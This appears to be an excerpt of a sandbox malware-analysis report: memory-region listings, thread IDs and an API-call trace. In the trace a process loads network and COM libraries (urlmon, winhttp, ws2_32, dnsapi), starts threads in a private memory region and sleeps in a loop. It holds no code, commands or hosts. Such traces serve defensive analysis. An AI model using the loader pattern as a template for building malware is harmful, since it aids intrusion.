monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23536 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23537 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23538 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23539 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23540 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23541 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23542 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23543 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23544 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23545 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23546 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23547 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23548 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23549 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23550 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23551 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23552 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23553 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23554 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23555 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23556 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23557 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23558 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23559 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23560 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23561 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23562 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23563 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23564 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23565 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23566 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23567 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23568 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23569 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23570 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23571 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23572 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23573 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23574 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23575 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23576 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23577 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23578 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23579 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23580 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23581 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23582 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23583 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23584 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23585 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23586 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23587 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23588 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23589 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23590 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23591 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23592 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23593 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23594 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23595 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23596 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23597 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23598 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23599 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23600 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23601 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23602 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23603 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23604 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23605 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 23606 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23607 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Thread: id = 5 os_tid = 0x520 Thread: id = 6 os_tid = 0x13dc Thread: id = 7 os_tid = 0x139c Thread: id = 8 os_tid = 0x137c Thread: id = 9 os_tid = 0x1378 Thread: id = 10 os_tid = 0x1374 Thread: id = 11 os_tid = 0x1370 Thread: id = 12 os_tid = 0x1308 Thread: id = 13 os_tid = 0x12fc Thread: id = 14 os_tid = 0x12c4 Thread: id = 15 os_tid = 0x1060 Thread: id = 16 os_tid = 0xc30 Thread: id = 17 os_tid = 0xe50 Thread: id = 18 os_tid = 0xe34 Thread: id = 19 os_tid = 0xe00 Thread: id = 20 os_tid = 0x908 Thread: id = 21 os_tid = 0x928 Thread: id = 22 os_tid = 0x8bc Thread: id = 23 os_tid = 0x5d4 Thread: id = 24 os_tid = 0x8b0 Thread: id = 25 os_tid = 0xbfc Thread: id = 26 os_tid = 0xbf8 Thread: id = 27 os_tid = 0xb94 Thread: id = 28 os_tid = 0xa9c Thread: id = 29 os_tid = 0x7b4 Thread: id = 30 os_tid = 0x7ac Thread: id = 31 os_tid = 0x7a8 Thread: id = 32 os_tid = 0x774 Thread: id = 33 os_tid = 0x768 Thread: id = 34 os_tid = 0x764 Thread: id = 35 os_tid = 0x75c Thread: id = 36 os_tid = 0x754 Thread: id = 37 os_tid = 0x73c Thread: id = 38 os_tid = 0x728 Thread: id = 39 os_tid = 0x710 Thread: id = 40 os_tid = 0x6f0 Thread: id = 41 os_tid = 0x6d4 Thread: id = 42 os_tid = 0x6d0 Thread: id = 43 os_tid = 0x6c8 Thread: id = 44 os_tid = 0x6b8 Thread: id = 45 os_tid = 0x6b4 Thread: id = 46 os_tid = 0x6a8 Thread: id = 47 os_tid = 0x6a4 Thread: id = 48 os_tid = 0x69c Thread: id = 49 os_tid = 0x68c Thread: id = 50 os_tid = 0x688 Thread: id = 51 os_tid = 0x684 Thread: id = 52 os_tid = 0x644 Thread: id = 53 os_tid = 0x8 [0142.318] LoadLibraryA (lpLibFileName="NTDLL") returned 0x7ffb28b00000 [0142.320] GetProcAddress (hModule=0x7ffb28b00000, lpProcName="RtlExitUserThread") returned 0x7ffb28b5c2a0 [0142.322] RtlCreateHeap (Flags=0x1002, HeapBase=0x0, ReserveSize=0x0, CommitSize=0x0, Lock=0x0, Parameters=0x0) returned 0x7d40000 [0145.573] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x10) returned 0x7d40830 [0145.573] LoadLibraryA (lpLibFileName="user32") returned 0x7ffb26090000 [0145.574] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d40830) returned 0x10 [0145.574] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d40830) returned 1 [0145.574] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x12) returned 0x7d40830 [0145.574] LoadLibraryA (lpLibFileName="advapi32") returned 0x7ffb28a50000 [0145.574] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d40830) returned 0x12 [0145.574] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d40830) returned 1 [0145.574] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x10) returned 0x7d40830 [0145.575] LoadLibraryA (lpLibFileName="urlmon") returned 0x7ffb174f0000 [0145.575] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d40830) returned 0x10 [0145.575] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d40830) returned 1 [0145.575] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0xf) returned 0x7d40830 [0145.575] LoadLibraryA (lpLibFileName="ole32") returned 0x7ffb281e0000 [0145.576] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d40830) returned 0xf [0145.576] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d40830) returned 1 [0145.576] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x11) returned 0x7d40830 [0145.576] LoadLibraryA (lpLibFileName="winhttp") returned 0x7ffb21040000 [0145.576] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d40830) returned 0x11 [0145.576] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d40830) returned 1 [0145.577] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x10) returned 0x7d40830 [0145.577] LoadLibraryA (lpLibFileName="ws2_32") returned 0x7ffb28450000 [0145.646] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d40830) returned 0x10 [0145.646] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d40830) returned 1 [0145.646] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x10) returned 0x7d40830 [0145.646] LoadLibraryA (lpLibFileName="dnsapi") returned 0x7ffb23b90000 [0145.647] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d40830) returned 0x10 [0145.647] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d40830) returned 1 [0145.647] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x11) returned 0x7d40830 [0145.647] LoadLibraryA (lpLibFileName="shell32") returned 0x7ffb267e0000 [0145.648] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d40830) returned 0x11 [0145.648] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d40830) returned 1 [0145.649] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffb27e00000 [0145.651] GetProcAddress (hModule=0x7ffb27e00000, lpProcName="CoInitializeEx") returned 0x7ffb27e62c50 [0145.652] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffb27e00000 [0145.654] GetProcAddress (hModule=0x7ffb27e00000, lpProcName="CoInitializeSecurity") returned 0x7ffb27e35fe0 [0145.654] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffb27e00000 [0145.655] GetProcAddress (hModule=0x7ffb27e00000, lpProcName="CoCreateInstance") returned 0x7ffb27e9fb70 [0145.655] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffb27e00000 [0145.657] GetProcAddress (hModule=0x7ffb27e00000, lpProcName="CoUninitialize") returned 0x7ffb27e61540 [0145.657] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2843c94, lpParameter=0x2830000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1fa8 [0145.658] CloseHandle (hObject=0x1fa8) returned 1 [0145.658] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2843d70, lpParameter=0x2830000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1fa8 [0145.658] CloseHandle (hObject=0x1fa8) returned 1 [0145.658] Sleep (dwMilliseconds=0xa) [0145.747] Sleep (dwMilliseconds=0xa) [0145.788] Sleep (dwMilliseconds=0xa) [0145.827] Sleep (dwMilliseconds=0xa) [0145.871] Sleep (dwMilliseconds=0xa) [0145.918] Sleep (dwMilliseconds=0xa) [0145.962] Sleep (dwMilliseconds=0xa) [0145.975] Sleep (dwMilliseconds=0xa) [0145.991] Sleep (dwMilliseconds=0xa) [0146.005] Sleep (dwMilliseconds=0xa) [0146.017] Sleep (dwMilliseconds=0xa) [0146.046] Sleep (dwMilliseconds=0xa) [0146.089] Sleep (dwMilliseconds=0xa) [0146.221] Sleep (dwMilliseconds=0xa) [0146.272] Sleep (dwMilliseconds=0xa) [0146.384] Sleep (dwMilliseconds=0xa) [0146.428] Sleep (dwMilliseconds=0xa) [0146.472] Sleep (dwMilliseconds=0xa) [0146.524] Sleep (dwMilliseconds=0xa) [0146.567] Sleep (dwMilliseconds=0xa) [0146.584] Sleep (dwMilliseconds=0xa) [0146.598] Sleep (dwMilliseconds=0xa) [0146.649] Sleep (dwMilliseconds=0xa) [0146.678] Sleep (dwMilliseconds=0xa) [0146.782] Sleep (dwMilliseconds=0xa) [0146.867] Sleep (dwMilliseconds=0xa) [0146.932] Sleep (dwMilliseconds=0xa) [0146.975] Sleep (dwMilliseconds=0xa) [0147.016] Sleep (dwMilliseconds=0xa) [0147.057] Sleep (dwMilliseconds=0xa) [0147.094] Sleep (dwMilliseconds=0xa) [0147.127] Sleep (dwMilliseconds=0xa) [0147.139] Sleep (dwMilliseconds=0xa) [0147.152] Sleep (dwMilliseconds=0xa) [0147.164] Sleep (dwMilliseconds=0xa) [0147.176] Sleep (dwMilliseconds=0xa) [0147.221] Sleep (dwMilliseconds=0xa) [0147.332] Sleep (dwMilliseconds=0xa) [0147.404] Sleep (dwMilliseconds=0xa) [0147.445] Sleep (dwMilliseconds=0xa) [0147.500] Sleep (dwMilliseconds=0xa) [0147.543] Sleep (dwMilliseconds=0xa) [0147.581] Sleep (dwMilliseconds=0xa) [0147.592] Sleep (dwMilliseconds=0xa) [0147.606] Sleep (dwMilliseconds=0xa) [0147.634] Sleep (dwMilliseconds=0xa) [0147.669] Sleep (dwMilliseconds=0xa) [0147.707] Sleep (dwMilliseconds=0xa) [0147.772] Sleep (dwMilliseconds=0xa) [0147.813] Sleep (dwMilliseconds=0xa) [0147.852] Sleep (dwMilliseconds=0xa) [0147.891] Sleep (dwMilliseconds=0xa) [0147.937] Sleep (dwMilliseconds=0xa) [0148.052] Sleep (dwMilliseconds=0xa) [0148.084] Sleep (dwMilliseconds=0xa) [0148.105] Sleep (dwMilliseconds=0xa) [0148.120] Sleep (dwMilliseconds=0xa) [0148.135] Sleep (dwMilliseconds=0xa) [0148.147] Sleep (dwMilliseconds=0xa) [0148.159] Sleep (dwMilliseconds=0xa) [0148.174] Sleep (dwMilliseconds=0xa) [0148.251] Sleep (dwMilliseconds=0xa) [0148.371] Sleep (dwMilliseconds=0xa) [0148.456] Sleep (dwMilliseconds=0xa) [0148.501] Sleep (dwMilliseconds=0xa) [0148.543] Sleep (dwMilliseconds=0xa) [0148.597] Sleep (dwMilliseconds=0xa) [0148.670] Sleep (dwMilliseconds=0xa) [0148.690] Sleep (dwMilliseconds=0xa) [0148.702] Sleep (dwMilliseconds=0xa) [0148.737] Sleep (dwMilliseconds=0xa) [0148.763] Sleep (dwMilliseconds=0xa) [0148.777] Sleep (dwMilliseconds=0xa) [0148.854] Sleep (dwMilliseconds=0xa) [0148.927] Sleep (dwMilliseconds=0xa) [0148.971] Sleep (dwMilliseconds=0xa) [0149.008] Sleep (dwMilliseconds=0xa) [0149.046] Sleep (dwMilliseconds=0xa) [0149.085] Sleep (dwMilliseconds=0xa) [0149.104] Sleep (dwMilliseconds=0xa) [0149.116] Sleep (dwMilliseconds=0xa) [0149.130] Sleep (dwMilliseconds=0xa) [0149.142] Sleep (dwMilliseconds=0xa) [0149.242] Sleep (dwMilliseconds=0xa) [0149.310] Sleep (dwMilliseconds=0xa) [0149.399] Sleep (dwMilliseconds=0xa) [0149.503] Sleep (dwMilliseconds=0xa) [0149.582] Sleep (dwMilliseconds=0xa) [0149.716] Sleep (dwMilliseconds=0xa) [0149.763] Sleep (dwMilliseconds=0xa) [0149.798] Sleep (dwMilliseconds=0xa) [0149.811] Sleep (dwMilliseconds=0xa) [0149.829] Sleep (dwMilliseconds=0xa) [0149.843] Sleep (dwMilliseconds=0xa) [0149.857] Sleep (dwMilliseconds=0xa) [0149.896] Sleep (dwMilliseconds=0xa) [0149.954] Sleep (dwMilliseconds=0xa) [0150.006] Sleep (dwMilliseconds=0xa) [0150.084] Sleep (dwMilliseconds=0xa) [0150.130] Sleep (dwMilliseconds=0xa) [0150.190] Sleep (dwMilliseconds=0xa) [0150.239] Sleep (dwMilliseconds=0xa) [0150.291] Sleep (dwMilliseconds=0xa) [0150.360] Sleep (dwMilliseconds=0xa) [0150.404] Sleep (dwMilliseconds=0xa) [0150.417] Sleep (dwMilliseconds=0xa) [0150.472] Sleep (dwMilliseconds=0xa) [0150.528] Sleep (dwMilliseconds=0xa) [0150.572] Sleep (dwMilliseconds=0xa) [0150.688] Sleep (dwMilliseconds=0xa) [0150.736] Sleep (dwMilliseconds=0xa) [0150.780] Sleep (dwMilliseconds=0xa) [0150.841] Sleep (dwMilliseconds=0xa) [0150.881] Sleep (dwMilliseconds=0xa) [0150.900] Sleep (dwMilliseconds=0xa) [0150.963] Sleep (dwMilliseconds=0xa) [0151.039] Sleep (dwMilliseconds=0xa) [0151.152] Sleep (dwMilliseconds=0xa) [0151.257] Sleep (dwMilliseconds=0xa) [0151.299] Sleep (dwMilliseconds=0xa) [0151.645] Sleep (dwMilliseconds=0xa) [0151.658] Sleep (dwMilliseconds=0xa) [0151.670] Sleep (dwMilliseconds=0xa) [0151.682] Sleep (dwMilliseconds=0xa) [0151.694] Sleep (dwMilliseconds=0xa) [0151.736] Sleep (dwMilliseconds=0xa) [0151.775] Sleep (dwMilliseconds=0xa) [0151.814] Sleep (dwMilliseconds=0xa) [0151.857] Sleep (dwMilliseconds=0xa) [0151.953] Sleep (dwMilliseconds=0xa) [0151.994] Sleep (dwMilliseconds=0xa) [0152.038] Sleep (dwMilliseconds=0xa) [0152.075] Sleep (dwMilliseconds=0xa) [0152.091] Sleep (dwMilliseconds=0xa) [0152.111] Sleep (dwMilliseconds=0xa) [0152.159] Sleep (dwMilliseconds=0xa) [0152.259] Sleep (dwMilliseconds=0xa) [0152.303] Sleep (dwMilliseconds=0xa) [0152.346] Sleep (dwMilliseconds=0xa) [0152.386] Sleep (dwMilliseconds=0xa) [0152.461] Sleep (dwMilliseconds=0xa) [0152.536] Sleep (dwMilliseconds=0xa) [0152.577] Sleep (dwMilliseconds=0xa) [0152.594] Sleep (dwMilliseconds=0xa) [0152.609] Sleep (dwMilliseconds=0xa) [0152.620] Sleep (dwMilliseconds=0xa) [0152.637] Sleep (dwMilliseconds=0xa) [0152.652] Sleep (dwMilliseconds=0xa) [0152.664] Sleep (dwMilliseconds=0xa) [0152.679] Sleep (dwMilliseconds=0xa) [0152.716] Sleep (dwMilliseconds=0xa) [0152.968] Sleep (dwMilliseconds=0xa) [0153.041] Sleep (dwMilliseconds=0xa) [0153.085] Sleep (dwMilliseconds=0xa) [0153.130] Sleep (dwMilliseconds=0xa) [0153.174] Sleep (dwMilliseconds=0xa) [0153.216] Sleep (dwMilliseconds=0xa) [0153.265] Sleep (dwMilliseconds=0xa) [0153.277] Sleep (dwMilliseconds=0xa) [0153.289] Sleep (dwMilliseconds=0xa) [0153.335] Sleep (dwMilliseconds=0xa) [0153.385] Sleep (dwMilliseconds=0xa) [0153.468] Sleep (dwMilliseconds=0xa) [0153.537] Sleep (dwMilliseconds=0xa) [0153.581] Sleep (dwMilliseconds=0xa) [0153.619] Sleep (dwMilliseconds=0xa) [0153.659] Sleep (dwMilliseconds=0xa) [0153.705] Sleep (dwMilliseconds=0xa) [0153.745] Sleep (dwMilliseconds=0xa) [0153.769] Sleep (dwMilliseconds=0xa) [0153.782] Sleep (dwMilliseconds=0xa) [0153.794] Sleep (dwMilliseconds=0xa) [0153.808] Sleep (dwMilliseconds=0xa) [0153.822] Sleep (dwMilliseconds=0xa) [0153.834] Sleep (dwMilliseconds=0xa) [0153.944] Sleep (dwMilliseconds=0xa) [0154.220] Sleep (dwMilliseconds=0xa) [0154.287] Sleep (dwMilliseconds=0xa) [0154.331] Sleep (dwMilliseconds=0xa) [0154.371] Sleep (dwMilliseconds=0xa) [0154.409] Sleep (dwMilliseconds=0xa) [0154.447] Sleep (dwMilliseconds=0xa) [0154.480] Sleep (dwMilliseconds=0xa) [0154.492] Sleep (dwMilliseconds=0xa) [0154.504] Sleep (dwMilliseconds=0xa) [0154.524] Sleep (dwMilliseconds=0xa) [0154.564] Sleep (dwMilliseconds=0xa) [0154.668] Sleep (dwMilliseconds=0xa) [0154.743] Sleep (dwMilliseconds=0xa) [0154.789] Sleep (dwMilliseconds=0xa) [0154.827] Sleep (dwMilliseconds=0xa) [0154.895] Sleep (dwMilliseconds=0xa) [0154.950] Sleep (dwMilliseconds=0xa) [0154.992] Sleep (dwMilliseconds=0xa) [0155.029] Sleep (dwMilliseconds=0xa) [0155.041] Sleep (dwMilliseconds=0xa) [0155.098] Sleep (dwMilliseconds=0xa) [0155.145] Sleep (dwMilliseconds=0xa) [0155.280] Sleep (dwMilliseconds=0xa) [0155.376] Sleep (dwMilliseconds=0xa) [0155.418] Sleep (dwMilliseconds=0xa) [0155.468] Sleep (dwMilliseconds=0xa) [0155.509] Sleep (dwMilliseconds=0xa) [0155.668] Sleep (dwMilliseconds=0xa) [0155.708] Sleep (dwMilliseconds=0xa) [0155.720] Sleep (dwMilliseconds=0xa) [0155.733] Sleep (dwMilliseconds=0xa) [0155.754] Sleep (dwMilliseconds=0xa) [0155.765] Sleep (dwMilliseconds=0xa) [0155.780] Sleep (dwMilliseconds=0xa) [0155.803] Sleep (dwMilliseconds=0xa) [0155.865] Sleep (dwMilliseconds=0xa) [0156.009] Sleep (dwMilliseconds=0xa) [0156.082] Sleep (dwMilliseconds=0xa) [0156.123] Sleep (dwMilliseconds=0xa) [0156.162] Sleep (dwMilliseconds=0xa) [0156.200] Sleep (dwMilliseconds=0xa) [0156.238] Sleep (dwMilliseconds=0xa) [0156.275] Sleep (dwMilliseconds=0xa) [0156.287] Sleep (dwMilliseconds=0xa) [0156.303] Sleep (dwMilliseconds=0xa) [0156.319] Sleep (dwMilliseconds=0xa) [0156.334] Sleep (dwMilliseconds=0xa) [0156.383] Sleep (dwMilliseconds=0xa) [0156.492] Sleep (dwMilliseconds=0xa) [0156.591] Sleep (dwMilliseconds=0xa) [0156.669] Sleep (dwMilliseconds=0xa) [0156.708] Sleep (dwMilliseconds=0xa) [0156.748] Sleep (dwMilliseconds=0xa) [0156.784] Sleep (dwMilliseconds=0xa) [0156.811] Sleep (dwMilliseconds=0xa) [0156.822] Sleep (dwMilliseconds=0xa) [0156.833] Sleep (dwMilliseconds=0xa) [0156.845] Sleep (dwMilliseconds=0xa) [0156.861] Sleep (dwMilliseconds=0xa) [0156.899] Sleep (dwMilliseconds=0xa) [0157.018] Sleep (dwMilliseconds=0xa) [0157.086] Sleep (dwMilliseconds=0xa) [0157.132] Sleep (dwMilliseconds=0xa) [0157.176] Sleep (dwMilliseconds=0xa) [0157.215] Sleep (dwMilliseconds=0xa) [0157.254] Sleep (dwMilliseconds=0xa) [0157.296] Sleep (dwMilliseconds=0xa) [0157.333] Sleep (dwMilliseconds=0xa) [0157.348] Sleep (dwMilliseconds=0xa) [0157.362] Sleep (dwMilliseconds=0xa) [0157.376] Sleep (dwMilliseconds=0xa) 